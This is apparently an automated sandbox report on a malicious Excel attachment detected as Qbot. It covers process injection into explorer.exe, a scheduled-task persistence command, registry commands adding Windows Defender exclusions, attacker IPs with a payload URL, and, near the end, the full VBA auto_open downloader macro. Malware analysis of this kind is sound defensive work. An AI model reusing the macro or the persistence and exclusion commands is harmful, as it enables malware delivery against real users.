                        Drops PE files to the user root directory
                        Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_100030B7 StartServiceCtrlDispatcherA, 13_2_100030B7

                        Hooking and other Techniques for Hiding and Protection:

                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 448 base: 60102D value: E9 BA 4C AC FF
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3068 base: 60102D value: E9 BA 4C A8 FF
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1172 Thread sleep count: 47 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1592 Thread sleep time: -96000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2940 Thread sleep count: 52 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2028 Thread sleep count: 74 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2028 Thread sleep time: -88000s >= -30000s
                        Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 6_2_1000D01F
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW, 6_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000CAEB4 FindFirstFileW,FindNextFileW, 7_2_000CAEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW, 13_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW, 14_2_0008AEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 6_2_10005F82
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress, 6_2_1000DFAD
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000C5A61 RtlAddVectoredExceptionHandler, 7_2_000C5A61
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00085A61 RtlAddVectoredExceptionHandler, 14_2_00085A61

                        HIPS / PFW / Operating System Protection Evasion:

                        Maps a DLL or memory area into another process
                        Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 60102D
                        Allocates memory in foreign processes
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 448 base: F0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 448 base: 60102D value: E9
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3068 base: F0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3068 base: 60102D value: E9
                        Yara detected hidden Macro 4.0 in Excel
                        Source: Yara match File source: CompensationClaim-1630636598-09282021.xls, type: SAMPLE
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29
                        Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'
                        Source: explorer.exe, 00000007.00000002.881888888.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.881888888.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.881888888.0000000000BD0000.00000002.00020000.sdmp Binary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000C31C2 CreateNamedPipeA, 7_2_000C31C2
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 6_2_1000980C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 6_2_1000D01F

                        Stealing of Sensitive Information:

                        Yara detected Qbot
                        Source: Yara match File source: 13.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 7.2.explorer.exe.c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 6.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 7.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 13.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 6.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: 00000006.00000002.616094137.00000000001E0000.00000004.00000001.sdmp, type: MEMORY

                        Remote Access Functionality:

                        Yara detected Qbot

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Command and Scripting Interpreter 11 | Windows Service 3 | Windows Service 3 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 413 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 11 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | Scripting 2 | Logon Script (Windows) | Scheduled Task/Job 1 | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | Service Execution 2 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
                        Cloud Accounts | Native API 1 | Network Logon Script | Network Logon Script | Process Injection 413 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Exploitation for Client Execution 32 | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

[Behavior graph, ID: 492661. Sample: CompensationClaim-163063659..., Startdate: 28/09/2021, Architecture: WINDOWS, Score: 100. Processes shown: EXCEL.EXE, regsvr32.exe, explorer.exe, reg.exe, schtasks.exe. Dropped files shown: C:\Users\user\...\44467.926671412[1].dat (PE32), C:\Users\user\Drezd.red (PE32). Contacted IPs shown: 94.140.112.126, 190.14.37.187, 185.141.27.213.]


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| CompensationClaim-1630636598-09282021.xls | 9% | ReversingLabs | Document-Excel.Downloader.Heuristic |

                        Dropped Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat | 16% | ReversingLabs | Win32.Trojan.Generic |

                        Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 6.2.regsvr32.exe.2710000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2 |
| 13.2.regsvr32.exe.1510000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2 |

                        Domains

                        No Antivirus matches

                        URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://www.%s.comPA | 0% | URL Reputation | safe |
| http://190.14.37.187/44467.926671412.dat | 0% | Avira URL Cloud | safe |
| http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://190.14.37.187/44467.926671412.dat | false | Avira URL Cloud: safe | unknown |

                        URLs from Memory and Binaries

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://www.%s.comPA | regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881939093.0000000001FD0000.00000002.00020000.sdmp | false | URL Reputation: safe | low |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp | false | | high |
| http://servername/isapibackend.dll | regsvr32.exe, 00000005.00000002.619981269.0000000001C90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.616276328.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.620593142.0000000001CE0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.621391071.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.633974439.0000000000970000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low |

                          Contacted IPs


                          Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 185.141.27.213 | unknown | Netherlands | 60117 | HSAE | false |
| 190.14.37.187 | unknown | Panama | 52469 | OffshoreRacksSAPA | false |
| 94.140.112.126 | unknown | Latvia | 3212 | TELEMACHBroadbandAccessCarrierServicesSI | false |

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492661
                          Start date:28.09.2021
                          Start time:22:13:52
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 8s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:CompensationClaim-1630636598-09282021.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 22.5% (good quality ratio 21.5%)
                          • Quality average: 77.5%
                          • Quality standard deviation: 26.4%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 130
                          • Number of non-executed functions: 80
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 22:15:55 | API Interceptor | 27x Sleep call for process: regsvr32.exe modified |
| 22:15:56 | API Interceptor | 864x Sleep call for process: explorer.exe modified |
| 22:15:59 | API Interceptor | 1x Sleep call for process: schtasks.exe modified |
| 22:16:00 | Task Scheduler | Run new task: rzbsnuprv path: regsvr32.exe s>-s "C:\Users\user\Drezd.red" |

                          Joe Sandbox View / Context

                          IPs

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 185.141.27.213 | CompensationClaim-1033191014-09282021.xls | malicious | |
| 190.14.37.187 | CompensationClaim-1033191014-09282021.xls | malicious | 190.14.37.187/44467.9218096065.dat |
| 94.140.112.126 | CompensationClaim-1033191014-09282021.xls | malicious | |

                              Domains

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat | CompensationClaim-1033191014-09282021.xls | malicious | |
| C:\Users\user\Drezd.red | CompensationClaim-1033191014-09282021.xls | malicious | |

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):259072
                                  Entropy (8bit):5.307481689640455
                                  Encrypted:false
                                  SSDEEP:3072:0PQdEOItJPxluIalXQOr+nxQNBO0jTL23i7eBnaVImWeqSR4G78SYSuDSMv6UWo:MUr+nxQNBO0jf2Ee5aSzeF4DSY7Dh6e
                                  MD5:EBEC2F5AC1E5F9D51D12FF7131795C35
                                  SHA1:2C07EE3F23FD2A62373412D67DDBCA312445D29E
                                  SHA-256:405E8907B3775351B266445FAE051055A10D97FB89ED926B5FA083F32028F5D4
                                  SHA-512:0152F35C26DA5DAD857A5B8C23BD802D9B730D91C1916A25374B957440971FA6A2716F3C3F20FDF5343B752CE152511EC0D54122CD494957673221A28864C99A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 16%
                                  Joe Sandbox View:
• Filename: CompensationClaim-1033191014-09282021.xls, Detection: malicious
                                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):162688
                                  Entropy (8bit):4.254422803157279
                                  Encrypted:false
                                  SSDEEP:1536:C6QL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CdJNSc83tKBAvQVCgOtmXmLpLm4l
                                  MD5:3DBFF75AC25572D4B0F2865103664EAE
                                  SHA1:56496CA3507BD50E349E7F8E14AB7D77D801C109
                                  SHA-256:98FB6FA793E4DD244DFAC50A6C8CE9872D6ED31C2006800249FBB89C7FB6F0C9
                                  SHA-512:6EF69191B464BDC7D511A978E76419FC261C150155EC3B1A2A3E04F5E43508A5A3B648A489D477BB6712015C169BE834771F3B851D3F47545FD7C8D5C211ECF6
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15676
                                  Entropy (8bit):4.533222048457847
                                  Encrypted:false
                                  SSDEEP:192:CQxlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:N38xesT20lheZ3waE5D7qxIxkxe
                                  MD5:1D97F290DD63310568E6CF7D2E6DA61A
                                  SHA1:779388C0D863F0F2E9B4FFFF268CC38706F90E7D
                                  SHA-256:368281B5F78DD318F6DB95E82D80183F3998B6B9462E8933914FDAF22CBA5508
                                  SHA-512:2F564CD7F7FABC38222FC8FE197767425F3FE153911982192D8C8CEFC79AA6729044071D51C74BB33A945E9DD3381B75DC184AD8185055DE3AC745F588E47351
                                  Malicious:false
                                  C:\Users\user\Drezd.red
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):259072
                                  Entropy (8bit):2.3809766777560206
                                  Encrypted:false
                                  SSDEEP:1536:ar2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:KC6MtAAFNJ5XC5SYCi02r+J
                                  MD5:2668EB3008687022521F18765324BE31
                                  SHA1:260C9F618207ACE946E94FB3EF7D000536BE0636
                                  SHA-256:2382A58FAE508FA15BD5D02A39504B9C2898E8737BA417CB6EE54BD2A8804989
                                  SHA-512:0A880B74E8137EF1ADA7CFA03871AA69105444296229C1B4B71412FED43156A0EFB5145B0944EC6C39AB65CB880E7514F74820958862A88AAA7CDD150EBEB399
                                  Malicious:true
                                  Joe Sandbox View:
• Filename: CompensationClaim-1033191014-09282021.xls, Detection: malicious

                                  Static File Info

                                  General

                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Tue Sep 28 08:54:40 2021, Security: 0
                                  Entropy (8bit):7.060522557731598
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 47.99%
                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                  File name:CompensationClaim-1630636598-09282021.xls
                                  File size:140288
                                  MD5:f3e5e9eb94f7bc0115c4b373093d085d
                                  SHA1:2142f513fa165dbc4fe13d5aa1ccc10f029f31c5
                                  SHA256:a57b036af033da6944bb62320662310585d2f23b1d275cd7f01f9c786608e551
                                  SHA512:cf181030596ad4c6c98c2494c547ce3e1463714c324bd28f82e9b06a1fb6a8e106f4cbbdc6181d64cbcb1c37aa55bcd3261c47e68b0e1a7bd25f6d4cac635278
                                  SSDEEP:3072:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdAH11ScHlwFPYidH4C1TsNku0KRjkR+T99:Yk3hOdsylKlgxopeiBNhZF+E+W2kdAmi

                                  File Icon

                                  Icon Hash:e4eea286a4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "CompensationClaim-1630636598-09282021.xls"

                                  Indicators

                                  Has Summary Info:True
                                  Application Name:Microsoft Excel
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:True

                                  Summary

                                  Code Page:1251
                                  Author:Test
                                  Last Saved By:Test
                                  Create Time:2015-06-05 18:17:20
                                  Last Saved Time:2021-09-28 07:54:40
                                  Creating Application:Microsoft Excel
                                  Security:0

                                  Document Summary

                                  Document Code Page:1251
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:1048576

                                  Streams with VBA

                                  VBA File Name: UserForm2, Stream Size: -1
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/UserForm2
                                  VBA File Name:UserForm2
                                  Stream Size:-1
                                  Data ASCII:
                                  Data Raw:
                                  VBA Code
                                  Attribute VB_Name = "UserForm2"
                                  Attribute VB_Base = "0{67AAEC34-898C-47F8-855C-D3D5130D6038}{5E676636-BB8A-47DD-A223-6BA0EFDD38F5}"
                                  Attribute VB_GlobalNameSpace = False
                                  Attribute VB_Creatable = False
                                  Attribute VB_PredeclaredId = True
                                  Attribute VB_Exposed = False
                                  Attribute VB_TemplateDerived = False
                                  Attribute VB_Customizable = False
                                  VBA File Name: Module1, Stream Size: 1120
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                  VBA File Name:Module1
                                  Stream Size:1120
                                  VBA Code
                                  Attribute VB_Name = "Module1"
                                  
                                  Function jgfjgjfhfhf()
                                  Set Fera = Excel4IntlMacroSheets
                                  Fera.Add.Name = "Sheet777"
                                  End Function
                                  VBA File Name: Module5, Stream Size: 3869
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                                  VBA File Name:Module5
                                  Stream Size:3869
                                  VBA Code
                                  Attribute VB_Name = "Module5"
                                  
                                  Sub auto_open()
                                  On Error Resume Next
                                  Trewasd = "REGISTER"
                                  Drezden = "="
                                  Naret = "EXEC"
                                  Application.ScreenUpdating = False
                                  jgfjgjfhfhf
                                  Sheets("Sheet777").Visible = False
                                  Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
                                  
                                  Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
                                  Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
                                  Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption
                                  
                                  Sheets("Sheet777").Range("K17") = "=NOW()"
                                  Sheets("Sheet777").Range("K18") = ".dat"
                                  Sheets("Sheet777").Range("K18") = ".dat"
                                  
                                  
                                  Sheets("Sheet777").Range("H35") = "=" & "H" & "ALT()"
                                  Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
                                  Sheets("Sheet777").Range("I10") = UserForm2.Caption
                                  Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
                                  Sheets("Sheet777").Range("I12") = "Byukilos"
                                  Sheets("Sheet777").Range("G10") = "..\Drezd.red"
                                  Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
                                  Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
                                  Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
                                  Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
                                  Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
                                  Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
                                  Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
                                  Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
                                  Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
                                  Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
                                  Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
                                  Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"
                                  
                                  
                                  Application.Run Sheets("Sheet777").Range("H1")
                                  
                                  End Sub
                                  
                                  Sub auto_close()
                                  On Error Resume Next
                                  Application.ScreenUpdating = True
                                     Application.DisplayAlerts = False
                                     Sheets("Sheet777").Delete
                                     Application.DisplayAlerts = True
                                  End Sub
                                  VBA File Name: Sheet1, Stream Size: 991
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                  VBA File Name:Sheet1
                                  Stream Size:991
                                  VBA Code
                                  Attribute VB_Name = "Sheet1"
                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                  Attribute VB_GlobalNameSpace = False
                                  Attribute VB_Creatable = False
                                  Attribute VB_PredeclaredId = True
                                  Attribute VB_Exposed = True
                                  Attribute VB_TemplateDerived = False
                                  Attribute VB_Customizable = True
                                  VBA File Name: ThisWorkbook, Stream Size: 2393
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                  VBA File Name:ThisWorkbook
                                  Stream Size:2393
                                  VBA Code
                                  Attribute VB_Name = "ThisWorkbook"
                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                  Attribute VB_GlobalNameSpace = False
                                  Attribute VB_Creatable = False
                                  Attribute VB_PredeclaredId = True
                                  Attribute VB_Exposed = True
                                  Attribute VB_TemplateDerived = False
                                  Attribute VB_Customizable = True
                                  Option Explicit
                                  
                                  Private m_openAlreadyRan As Boolean
                                  Private m_isOpenDelayed As Boolean
                                  
                                  Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
                                  End Sub
                                  
                                  Private Sub asWorkbook_Activateas()
                                  
                                  End Sub
                                  
                                  Private Sub saWorkbook_Opensa()
                                      On Error Resume Next
                                  
                                  
                                  End Sub
                                  
                                  Private Sub ssaaInitWorkbookssaa()
                                      On Error Resume Next
                                  
                                      If VBA.Val(Application.Version) < 12 Then
                                          Me.Close False
                                          Exit Sub
                                      End If
                                      '
                                          'Other code
                                          '
                                          '
                                          '
                                  End Sub
                                  VBA File Name: UserForm2, Stream Size: 1181
                                  General
                                  Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                                  VBA File Name:UserForm2
                                  Stream Size:1181
                                  VBA Code
                                  Attribute VB_Name = "UserForm2"
                                  Attribute VB_Base = "0{67AAEC34-898C-47F8-855C-D3D5130D6038}{5E676636-BB8A-47DD-A223-6BA0EFDD38F5}"
                                  Attribute VB_GlobalNameSpace = False
                                  Attribute VB_Creatable = False
                                  Attribute VB_PredeclaredId = True
                                  Attribute VB_Exposed = False
                                  Attribute VB_TemplateDerived = False
                                  Attribute VB_Customizable = False

                                  Streams

                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                                  General
